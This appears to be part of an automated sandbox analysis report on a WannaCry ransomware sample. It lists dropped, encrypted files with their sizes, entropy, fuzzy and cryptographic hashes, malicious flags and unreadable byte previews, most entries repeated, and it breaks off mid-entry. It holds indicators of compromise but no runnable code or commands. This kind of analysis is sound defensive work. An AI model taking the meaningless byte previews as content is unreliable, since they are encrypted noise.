                                                                                      MD5:6CD6361D43F85D008227596CCC719677
                                                                                      SHA1:ED1D0084BC6F504C00B3F696F08D563C643B9081
                                                                                      SHA-256:5D92578EF7D02CD3F302F8E7EA9C670786BE51CFDE5ADB7B5E7C936D357C7537
                                                                                      SHA-512:584F06A096EB0F00E6E204E9D2F1AED5038C389A9DA0671E8A896EE015CB5C7D477BFC38F3A0DD98B31A5EEE81BC7B92461AFF765E69620BCA2800EBC81E7ED7
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....7ck.c......t.......tki...eE37t.y..-.........@.4V..}..%..}q.H|..44.....).g=H>...E......~.m.[.....y...j.4n..sD6(.JQ..N..t.-/......;.K5...).\'.7@.5ws2.;q2..e".J..9/..J..7.}..MF.7..."..<....~v..T......M.Xf5:OV3.y.}g.J8J|.....yB...JO...O...'..]R..Y.................[-....N9H.m..=..p[.....,y.#.|K2.n;....~.B.k.]o...X...~o......2U`1....=F....;s...2...."..I(.cVz... ..V..6..~I'....Y.z<.T&.T.'......4.Z.......#....Y..,...hG.D`....dq....Q.Egf0\.t|rjB......o!.....JV...%l.....az...fV....y..X.&.............Dq.;..:.....!.!.1.. ......P1qF}l!.g..z.*.6*....Men.A.....@)......`.dlI.R.J...`...;..'.Oj.w..{.Z..3.Q.mVO...!.6.".#..6....-|..,.`.4@.EM.L,-n..,.a..... ...2.=..u_l...e.....8....#.l.[.^%MX....B... 3..G...1.Uu.?>.....{..$..QC.:.~.z.l..-|..+R2..8...x......e8=..{8K.RzN...'x=t....+....jw.O.pMZ.yc.t...f.:...L....:.X...P.Z..~.E..U}%J.m....P..E%.6.....A8Si..6..^.9$w.....7.u.}.e..h...>.....&.W.L'....j....k2...d.s.@..}...z.[..k;......b.....o.l.H.p..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.128907426163895
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEvv71cf84/bKBIn5EnZ2a/EfcvFw3eiXCkQeEPxkCLz:bkEvv7xhB+5OF1tw36kQpFLz
                                                                                      MD5:A1F3784ABDECFE2E37F303EDE697437C
                                                                                      SHA1:2225C0EAC0BB3C802ADA319519AC8D34666F2C01
                                                                                      SHA-256:726F9EA6789D31E05AB26B4A714DC7CB4115CC3170401DFD35DC5220C9D2DA87
                                                                                      SHA-512:0B391D568ED5A4EF652D3EFD2BB71FE19C4C239E2DB6761DA7E7CB4715313973859826C7F67CBF5F770071549CF0C4891D944F12585AFD43B9DB154F91400D97
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........XX......_..A...I.!:b.0.....j&...z.c../7.C..G.3....<w,.......s.......{~.l..4$.?Io..%....G....>.......R.....Fn..|....0....e.z....<.56C^..#R.v..o6.pM.!...F#.E3.:Q.v.......S...a.x...u.Q|.C!bR..8.n$.*.{w.x..fC...N<6Ib.!......OY.{.4..1...[K.......................$..a%.+.....3..h1..!d
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.128907426163895
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEvv71cf84/bKBIn5EnZ2a/EfcvFw3eiXCkQeEPxkCLz:bkEvv7xhB+5OF1tw36kQpFLz
                                                                                      MD5:A1F3784ABDECFE2E37F303EDE697437C
                                                                                      SHA1:2225C0EAC0BB3C802ADA319519AC8D34666F2C01
                                                                                      SHA-256:726F9EA6789D31E05AB26B4A714DC7CB4115CC3170401DFD35DC5220C9D2DA87
                                                                                      SHA-512:0B391D568ED5A4EF652D3EFD2BB71FE19C4C239E2DB6761DA7E7CB4715313973859826C7F67CBF5F770071549CF0C4891D944F12585AFD43B9DB154F91400D97
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........XX......_..A...I.!:b.0.....j&...z.c../7.C..G.3....<w,.......s.......{~.l..4$.?Io..%....G....>.......R.....Fn..|....0....e.z....<.56C^..#R.v..o6.pM.!...F#.E3.:Q.v.......S...a.x...u.Q|.C!bR..8.n$.*.{w.x..fC...N<6Ib.!......OY.{.4..1...[K.......................$..a%.+.....3..h1..!d
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3146008
                                                                                      Entropy (8bit):7.999947951139632
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:Y5NL73mxV8dKmBpXwUk3AHq3rWhMTL2+Lh+B41dYCLx0YQngEXxrr9/jTI:8vWx68spXwUAAmrWRumAdx8ngYZ/HI
                                                                                      MD5:F95CE0DA88305B0AF84C4ACBA6F2EEA8
                                                                                      SHA1:5953587CBD0418A5A611E73A6E974720BEFDA919
                                                                                      SHA-256:8CC6959ED718AEDF19046BB0ACF80E9DCF61A15A3B159CB853475C3973729DB9
                                                                                      SHA-512:64F809459EC573A370190E0ED81B19BE88BDFA9DE038753FC717295E368D5285F4B1E8A8FD174CD0D90FD506E61559F5D30E387920B096BD02960F703CD0B3E4
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....c]...h....R.K..a.a.9.D......;...mM..d.o.P.M..R.........e`X.".fo...~......f...].....*$....[..+.....X.-..tI..|!t...."....M.{.b.<.0a.<F.z.W...}..k....?...=....pp..JlTT..c....t.m.l.`....?u.pm^*wI.d....&..E.G......./..N..KC...g.....g..-..bE....6.......0..........|....60.i'q....i>......E......w.Vs..t.\..G.....p.Z(5gQ./.M...p....=....zF.gT.U....0.2\...s.5...?...DEC....G....mo}...=.3C...W.u..-..+...+....`...)....CMG.7....Vc....f.2.o.t../.....]....Df@[.$]...........S ..tY/.f]DX.m..H.[..m......Z..<..&....z.....a../..~..kdr....g... .zX[pB.C...B...../.............o|..pEbd$y....m.6...P-..B..,....=.#.kl..."...6.P.-....G~.,5.).hp\.Ud....p./.G.........gA....0.$.ca..S5..p.............%..U....J....Y...3...U1....:X..1.@.U...+.m...Y....r.:_.NOV>.e.b..M.3S.d..1!.83...`(..6.f._<.U}..o...G.q.c1..cL......YV...m[.."..yn...F~.?..I.G........"v/.{J...{...8-.W.+G3c.&....+..g..R..`....[,8YDfY4w.....p..*}.<....R.).....s..NG0[.&)}.+.q.^m.#Q.~...aG..T..v~
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3146008
                                                                                      Entropy (8bit):7.999947951139632
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:Y5NL73mxV8dKmBpXwUk3AHq3rWhMTL2+Lh+B41dYCLx0YQngEXxrr9/jTI:8vWx68spXwUAAmrWRumAdx8ngYZ/HI
                                                                                      MD5:F95CE0DA88305B0AF84C4ACBA6F2EEA8
                                                                                      SHA1:5953587CBD0418A5A611E73A6E974720BEFDA919
                                                                                      SHA-256:8CC6959ED718AEDF19046BB0ACF80E9DCF61A15A3B159CB853475C3973729DB9
                                                                                      SHA-512:64F809459EC573A370190E0ED81B19BE88BDFA9DE038753FC717295E368D5285F4B1E8A8FD174CD0D90FD506E61559F5D30E387920B096BD02960F703CD0B3E4
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....c]...h....R.K..a.a.9.D......;...mM..d.o.P.M..R.........e`X.".fo...~......f...].....*$....[..+.....X.-..tI..|!t...."....M.{.b.<.0a.<F.z.W...}..k....?...=....pp..JlTT..c....t.m.l.`....?u.pm^*wI.d....&..E.G......./..N..KC...g.....g..-..bE....6.......0..........|....60.i'q....i>......E......w.Vs..t.\..G.....p.Z(5gQ./.M...p....=....zF.gT.U....0.2\...s.5...?...DEC....G....mo}...=.3C...W.u..-..+...+....`...)....CMG.7....Vc....f.2.o.t../.....]....Df@[.$]...........S ..tY/.f]DX.m..H.[..m......Z..<..&....z.....a../..~..kdr....g... .zX[pB.C...B...../.............o|..pEbd$y....m.6...P-..B..,....=.#.kl..."...6.P.-....G~.,5.).hp\.Ud....p./.G.........gA....0.$.ca..S5..p.............%..U....J....Y...3...U1....:X..1.@.U...+.m...Y....r.:_.NOV>.e.b..M.3S.d..1!.83...`(..6.f._<.U}..o...G.q.c1..cL......YV...m[.."..yn...F~.?..I.G........"v/.{J...{...8-.W.+G3c.&....+..g..R..`....[,8YDfY4w.....p..*}.<....R.).....s..NG0[.&)}.+.q.^m.#Q.~...aG..T..v~
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.241748373025863
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEN+7c/nzU8/BaIBAToIyy6RNXJ3zS0tFp5JHxydZAMJl9G2+gkMn:bkEsY/nQzikoKOzS0tj5VxG+Mp5+9Mn
                                                                                      MD5:E108624B36EB4A22B6EAA863A4879026
                                                                                      SHA1:1395CF8E36B0AC5543D5689901032117398BC35E
                                                                                      SHA-256:EC6C734119B921793A3B441E5037C52CD7152BFDC976957A9F2E716CE1F7B6CE
                                                                                      SHA-512:29B3A86ECD0734EDCB4CBE461CC977CFF0F350172A82F8C9A9378E97A67627E72916B4EB35138E9E3E9B5DD2314CFE037BAA324BBFBBCC9C77ED20A34F1DDBAD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....2k..TC...5J...`....t8..K.@".......:....X4.a=L..rz.Z'...d.GO..,D..$a9.)..[=P...C.....!W..5.jf3...-..@.N. .5....d.2l........n^.^.C1.>,...f2!.\..s.A.^.x...T"......2=...=5....C....n.j.:..5)..d.P..y..MR.w`#.JW.._..x..A.`."...Qm.Ts.%.....}`e.L..p..............."...i...|[.B.D...y....8.%.9N.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.241748373025863
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEN+7c/nzU8/BaIBAToIyy6RNXJ3zS0tFp5JHxydZAMJl9G2+gkMn:bkEsY/nQzikoKOzS0tj5VxG+Mp5+9Mn
                                                                                      MD5:E108624B36EB4A22B6EAA863A4879026
                                                                                      SHA1:1395CF8E36B0AC5543D5689901032117398BC35E
                                                                                      SHA-256:EC6C734119B921793A3B441E5037C52CD7152BFDC976957A9F2E716CE1F7B6CE
                                                                                      SHA-512:29B3A86ECD0734EDCB4CBE461CC977CFF0F350172A82F8C9A9378E97A67627E72916B4EB35138E9E3E9B5DD2314CFE037BAA324BBFBBCC9C77ED20A34F1DDBAD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....2k..TC...5J...`....t8..K.@".......:....X4.a=L..rz.Z'...d.GO..,D..$a9.)..[=P...C.....!W..5.jf3...-..@.N. .5....d.2l........n^.^.C1.>,...f2!.\..s.A.^.x...T"......2=...=5....C....n.j.:..5)..d.P..y..MR.w`#.JW.._..x..A.`."...Qm.Ts.%.....}`e.L..p..............."...i...|[.B.D...y....8.%.9N.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2097432
                                                                                      Entropy (8bit):7.999917404282548
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:WZu2rbhfcngXMGVHvjvWMi0Zd9XEp+aRvJOpClzB:WZxrbqkM4vDWMXZXXpav6kB
                                                                                      MD5:CA73F34FD422B1FE45422D7145DA2566
                                                                                      SHA1:271845892F3B0F4863F502912830E7C649F92DC4
                                                                                      SHA-256:5344BCC38A748C12C3F237ADF05E1AEA3E981A411CB8EF2DF151DB65796E8BFE
                                                                                      SHA-512:CE9A314139E61B7DF8BD56289B03033D82E3D840DE6B180291A963A5C729A33520C0726CB20396F7FD4636D0A245070400476880D00BD1F3836F037C8B70082F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........*..1j...&..!.`.{...`0...Ks..N.J..0o..E1.8z..O.*3Wh..Q..$..8.8c.f.:......$....m......E....+3T....7...I.i.l.0.l=..e.(..Az........f.F.5T_..$...!.Z..dY.j.......24....Zfw...i.%.....!....3.vWfs....v.a....].U.<.1..U.T........f...:.FT.......6U0...... ......G.....@>..$.........O.t..D&.,.......M....q\~/.$.VS.R.iQ,.X.T..c......-Y..B..4,..o.....e..p.\..9U...4ON..$...{.F.<..e.:..OD..Z.....'*....U?...).6....i.f..?.,..YFu+.m..=.....O.;...OiE.......+q...u@.....ms1.../.,Q..U......^.S..Ow.E..(c.7..8}..j}...0S.Uax.yb..u.......^.....+....Fi<......Q......W{....,.....R.~!.".g+..a4..+5\.>Sj..K@&n=|r....CW..u.F.w..:.*2LU....+._.G.....P..u......^...&>j...q.{..f.....k..4...BU........}._..._>Uq@..WxxE.......S./.dS[.].}...bVl.6.+`C..+c.9..Z^/.,0...w...s..n/.4...j.J..l............&.......R...l.w..L(.c....o.3}...v5..;..?1..e.7Iw..Zs...".........0T5up.i...ib..yL5.x.h.....b}A....~..U..../_.h[......]c.7+..u-.g..P..H....&c8>.I/i?...($7.[.+.k...).
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2097432
                                                                                      Entropy (8bit):7.999917404282548
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:WZu2rbhfcngXMGVHvjvWMi0Zd9XEp+aRvJOpClzB:WZxrbqkM4vDWMXZXXpav6kB
                                                                                      MD5:CA73F34FD422B1FE45422D7145DA2566
                                                                                      SHA1:271845892F3B0F4863F502912830E7C649F92DC4
                                                                                      SHA-256:5344BCC38A748C12C3F237ADF05E1AEA3E981A411CB8EF2DF151DB65796E8BFE
                                                                                      SHA-512:CE9A314139E61B7DF8BD56289B03033D82E3D840DE6B180291A963A5C729A33520C0726CB20396F7FD4636D0A245070400476880D00BD1F3836F037C8B70082F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........*..1j...&..!.`.{...`0...Ks..N.J..0o..E1.8z..O.*3Wh..Q..$..8.8c.f.:......$....m......E....+3T....7...I.i.l.0.l=..e.(..Az........f.F.5T_..$...!.Z..dY.j.......24....Zfw...i.%.....!....3.vWfs....v.a....].U.<.1..U.T........f...:.FT.......6U0...... ......G.....@>..$.........O.t..D&.,.......M....q\~/.$.VS.R.iQ,.X.T..c......-Y..B..4,..o.....e..p.\..9U...4ON..$...{.F.<..e.:..OD..Z.....'*....U?...).6....i.f..?.,..YFu+.m..=.....O.;...OiE.......+q...u@.....ms1.../.,Q..U......^.S..Ow.E..(c.7..8}..j}...0S.Uax.yb..u.......^.....+....Fi<......Q......W{....,.....R.~!.".g+..a4..+5\.>Sj..K@&n=|r....CW..u.F.w..:.*2LU....+._.G.....P..u......^...&>j...q.{..f.....k..4...BU........}._..._>Uq@..WxxE.......S./.dS[.].}...bVl.6.+`C..+c.9..Z^/.,0...w...s..n/.4...j.J..l............&.......R...l.w..L(.c....o.3}...v5..;..?1..e.7Iw..Zs...".........0T5up.i...ib..yL5.x.h.....b}A....~..U..../_.h[......]c.7+..u-.g..P..H....&c8>.I/i?...($7.[.+.k...).
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.999817368799914
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:y8lUY/CgS3r5hzpa/28phEPelGj1zwdJFk/vEUsBQCU43i:wodS3rvzI280Pel+yFFUsDi
                                                                                      MD5:E438FE1772C9D093A602439D90D632DD
                                                                                      SHA1:EE144E823E5C96D205EF1D74C3450D91C12D89EF
                                                                                      SHA-256:E05890DFDCA4F2EAFCEBBEDACA9EE9697B57E94B64A1E9E674A0D1397E65C092
                                                                                      SHA-512:AD75C082E18F3DED8C386B52074E64D01E25824A05AAD21726CA952579898C4DE275D00078A85CC0703E8C595EE3467B17D6233344545D35C298C0A4F8014DEC
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....d...*..D..d...?..B....d.?.zO.CM.\.g...%/#.b...J-...W_..p.T...z..28.o..TPr.."....w31.m..8.v...@.m....R9U....vgZ......(i.jS.a..J...e7.(.eq.=&jF..:m..a......Z............PX...P..Bu.....;._.w./1.d..@..,.!$.]B.~.u.?...`..$..&P....sz..~..a.!zl$....W...............{..G.<.$u..N...sW<.c......^B.3..{.K...wB?...u~Oz...$r^....).<.]<.E..`r^./..._NH.......5.'s.E@..,..K"....8y.y.JGe..j..t.g.^m..^.-...U*S.op..sq.(.^.W.^.!$.}.L..K.L.)yj...g.T.1.b...;..i....d...E.m.Vs.)G'....}.<W.(...$.q...D..0..S..UEr$....(p'..Q.....Q&. ...t.n.m.26..D..r.>..r2.J...tb..m.o.z....6*.5l..H.SJ.=a`h..@.Ikv...7....6}.qwuP{%.`.....'G.l.Ad...A...RbY.v4..M.J0........[......&.F;.P..EJ....:.......<.. ....&.U]a.$._.J...^3"D...=o...Z..m.h+}......H....`...=.](2t...(.....P.6..L..`.W...r......"Hh}..&...7$......\...+.0.^T..%....=.i......".0.N..?$P.X.....i........V...l.W."....nNYS.~..x*7.;. a.L......[7...1......j6.P..P..#".E.^Hk.#.z?...p.....$.........{.w.....k._z...^..G...]...5.e9
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.999817368799914
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:y8lUY/CgS3r5hzpa/28phEPelGj1zwdJFk/vEUsBQCU43i:wodS3rvzI280Pel+yFFUsDi
                                                                                      MD5:E438FE1772C9D093A602439D90D632DD
                                                                                      SHA1:EE144E823E5C96D205EF1D74C3450D91C12D89EF
                                                                                      SHA-256:E05890DFDCA4F2EAFCEBBEDACA9EE9697B57E94B64A1E9E674A0D1397E65C092
                                                                                      SHA-512:AD75C082E18F3DED8C386B52074E64D01E25824A05AAD21726CA952579898C4DE275D00078A85CC0703E8C595EE3467B17D6233344545D35C298C0A4F8014DEC
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....d...*..D..d...?..B....d.?.zO.CM.\.g...%/#.b...J-...W_..p.T...z..28.o..TPr.."....w31.m..8.v...@.m....R9U....vgZ......(i.jS.a..J...e7.(.eq.=&jF..:m..a......Z............PX...P..Bu.....;._.w./1.d..@..,.!$.]B.~.u.?...`..$..&P....sz..~..a.!zl$....W...............{..G.<.$u..N...sW<.c......^B.3..{.K...wB?...u~Oz...$r^....).<.]<.E..`r^./..._NH.......5.'s.E@..,..K"....8y.y.JGe..j..t.g.^m..^.-...U*S.op..sq.(.^.W.^.!$.}.L..K.L.)yj...g.T.1.b...;..i....d...E.m.Vs.)G'....}.<W.(...$.q...D..0..S..UEr$....(p'..Q.....Q&. ...t.n.m.26..D..r.>..r2.J...tb..m.o.z....6*.5l..H.SJ.=a`h..@.Ikv...7....6}.qwuP{%.`.....'G.l.Ad...A...RbY.v4..M.J0........[......&.F;.P..EJ....:.......<.. ....&.U]a.$._.J...^3"D...=o...Z..m.h+}......H....`...=.](2t...(.....P.6..L..`.W...r......"Hh}..&...7$......\...+.0.^T..%....=.i......".0.N..?$P.X.....i........V...l.W."....nNYS.~..x*7.;. a.L......[7...1......j6.P..P..#".E.^Hk.#.z?...p.....$.........{.w.....k._z...^..G...]...5.e9
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.162405784877907
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEy1uE3zov+Y/JITjwuWWSSu1Nu+ZVmunH4RDvPnUgdIp:bkEys3mY/JfBScwhuHqtdIp
                                                                                      MD5:81B7C2094316A4BE0F55AB66165C94A0
                                                                                      SHA1:72AB4C8D5C2648E4DE883E41E1EF961AAAAED041
                                                                                      SHA-256:0CB6DB902109D81DD09A7EB8A352ED6EC8824C808CFEF0FC4990676E0B367D35
                                                                                      SHA-512:7DE5BB08A6865473DDC33E4A09D4FAF318D9CAF3E20DE53DF2E93A2518B1165C243E0B784E02B3A100EF58D84E1F2C5696D4D8B65D0050497829E16A3529B56D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........[...|h.#$.;Rf..>')...\..Jq...\.L.8%...#....ef.+[......^.!{RE..m.w.D(yj...(...I..?.;...F.54C}Z:....NF.?D.N.^.7.?.nT.N....;..u>u....m...c....u./&....A......C.9..z...Q.%..vz...D......i..:.5.....!.....^.(..>7..X.o_..B..0_L.....+....(|'7`!....KA..............A6......1e.[M_.L(..}n...~..0.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.162405784877907
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEy1uE3zov+Y/JITjwuWWSSu1Nu+ZVmunH4RDvPnUgdIp:bkEys3mY/JfBScwhuHqtdIp
                                                                                      MD5:81B7C2094316A4BE0F55AB66165C94A0
                                                                                      SHA1:72AB4C8D5C2648E4DE883E41E1EF961AAAAED041
                                                                                      SHA-256:0CB6DB902109D81DD09A7EB8A352ED6EC8824C808CFEF0FC4990676E0B367D35
                                                                                      SHA-512:7DE5BB08A6865473DDC33E4A09D4FAF318D9CAF3E20DE53DF2E93A2518B1165C243E0B784E02B3A100EF58D84E1F2C5696D4D8B65D0050497829E16A3529B56D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........[...|h.#$.;Rf..>')...\..Jq...\.L.8%...#....ef.+[......^.!{RE..m.w.D(yj...(...I..?.;...F.54C}Z:....NF.?D.N.^.7.?.nT.N....;..u>u....m...c....u./&....A......C.9..z...Q.%..vz...D......i..:.5.....!.....^.(..>7..X.o_..B..0_L.....+....(|'7`!....KA..............A6......1e.[M_.L(..}n...~..0.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.222980595502582
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEcJwxha1kRX9p3TojUKji97Y2mAN6Jb4lqAyIlR:bkEuwxhnXj3To49Y2v6F4BywR
                                                                                      MD5:2F0493BFF85FF71D3919122E3BD2BDEB
                                                                                      SHA1:657486429F716ED2984B1D5784EC413FE05D5301
                                                                                      SHA-256:B092EED1FDE8F0BA7F9346893F592A56C77A550B27274D56A12ED3BA97107185
                                                                                      SHA-512:316B91984E338A763C5C5ABA78CBF593C014EDBED1117DBF8EC1A33A20E4398643337F74D6E574D84697FB73F62D3899BB3CA024FB152407464B98B241BC1062
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....W!...."..@ti=z....;...f...P/o..U_7...~.x....J......U..e:.$......j.=....z4..~../..K....E..z..yT......i....X../.}.I.V"..Nq..)....E....-5,3I......j....l...c.R.r+.[......Jf....2-dnqC..9....[./.}Go.2Is..^].%.....D..G..V.yP.....j.......+5...\................^...Q..3Yy......(..p.$I^.$...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.222980595502582
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEcJwxha1kRX9p3TojUKji97Y2mAN6Jb4lqAyIlR:bkEuwxhnXj3To49Y2v6F4BywR
                                                                                      MD5:2F0493BFF85FF71D3919122E3BD2BDEB
                                                                                      SHA1:657486429F716ED2984B1D5784EC413FE05D5301
                                                                                      SHA-256:B092EED1FDE8F0BA7F9346893F592A56C77A550B27274D56A12ED3BA97107185
                                                                                      SHA-512:316B91984E338A763C5C5ABA78CBF593C014EDBED1117DBF8EC1A33A20E4398643337F74D6E574D84697FB73F62D3899BB3CA024FB152407464B98B241BC1062
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....W!...."..@ti=z....;...f...P/o..U_7...~.x....J......U..e:.$......j.=....z4..~../..K....E..z..yT......i....X../.}.I.V"..Nq..)....E....-5,3I......j....l...c.R.r+.[......Jf....2-dnqC..9....[./.}Go.2Is..^].%.....D..G..V.yP.....j.......+5...\................^...Q..3Yy......(..p.$I^.$...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.244167884250747
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEVNotoKryvxEaL67nwuGhIleUscW52BsmXfbxyG3DmNg1LtHZ4zPr4v:bkEVk3mEamdGEeUscw2BzzQP8
                                                                                      MD5:A991B4BD79A2DD7C2B2C145026CC452B
                                                                                      SHA1:8313B508336C780B7C94D07C11F6827A34374D6D
                                                                                      SHA-256:8733F22D36E6031826C14ED2E32B2D9D2B2323F009DE49D277908763F85CCCC6
                                                                                      SHA-512:100EEB248BEB7F6417A3EAB0A797E5CFAAC670BCAB4D8BA43C9F00914F7B6E1CC372B2B6800CEA401FBEA7D39C14AC24FF78EEFB6E5E5137A325A04278E858A2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!............[.....tk.$i....1l`..0....q....%;.X...=.E..|.Y$l.....E8c.4;#$|.9.y..k}U(.\ba.^...\..b._..4i.G..{.A?...*p..N0...qG~#0..iv8.%.j.........,7.V.A...]...}...o..{...je.c8h.(.r1.>...... 3...a(G..p...C...Sh<..5.u..p..K.O.zX.M...^...XX.Hb...Z.Y8..i.............e.Gh...."/y.....S..8J*..A..%.-z
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.244167884250747
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEVNotoKryvxEaL67nwuGhIleUscW52BsmXfbxyG3DmNg1LtHZ4zPr4v:bkEVk3mEamdGEeUscw2BzzQP8
                                                                                      MD5:A991B4BD79A2DD7C2B2C145026CC452B
                                                                                      SHA1:8313B508336C780B7C94D07C11F6827A34374D6D
                                                                                      SHA-256:8733F22D36E6031826C14ED2E32B2D9D2B2323F009DE49D277908763F85CCCC6
                                                                                      SHA-512:100EEB248BEB7F6417A3EAB0A797E5CFAAC670BCAB4D8BA43C9F00914F7B6E1CC372B2B6800CEA401FBEA7D39C14AC24FF78EEFB6E5E5137A325A04278E858A2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!............[.....tk.$i....1l`..0....q....%;.X...=.E..|.Y$l.....E8c.4;#$|.9.y..k}U(.\ba.^...\..b._..4i.G..{.A?...*p..N0...qG~#0..iv8.%.j.........,7.V.A...]...}...o..{...je.c8h.(.r1.>...... 3...a(G..p...C...Sh<..5.u..p..K.O.zX.M...^...XX.Hb...Z.Y8..i.............e.Gh...."/y.....S..8J*..A..%.-z
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
